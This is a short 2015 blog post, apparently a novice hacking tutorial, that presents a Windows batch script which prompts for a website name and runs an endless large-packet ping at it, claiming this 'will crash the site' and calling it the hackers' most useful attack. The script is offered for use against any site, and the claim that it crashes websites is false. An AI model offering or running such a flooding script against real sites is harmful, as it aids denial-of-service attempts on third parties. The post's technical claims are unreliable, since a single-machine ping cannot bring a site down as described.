Thursday, July 16, 2015

How to crash a website using cmd

Hey guys, today i will show you how to crash a website in just few minutes using cmd.
Today we will increase the traffic on a site that will crash the site.
This is the most useful attack used by the Hackers.

  1. First you will need to open notepad.
  2. Then type this code.
@echo off
title website crasher
color a

:a
set /p name=Enter the website name:
goto b

:b
ping %name% -t -l 65500

3. This will crash the site.
4. Now please like our post.

2 comments: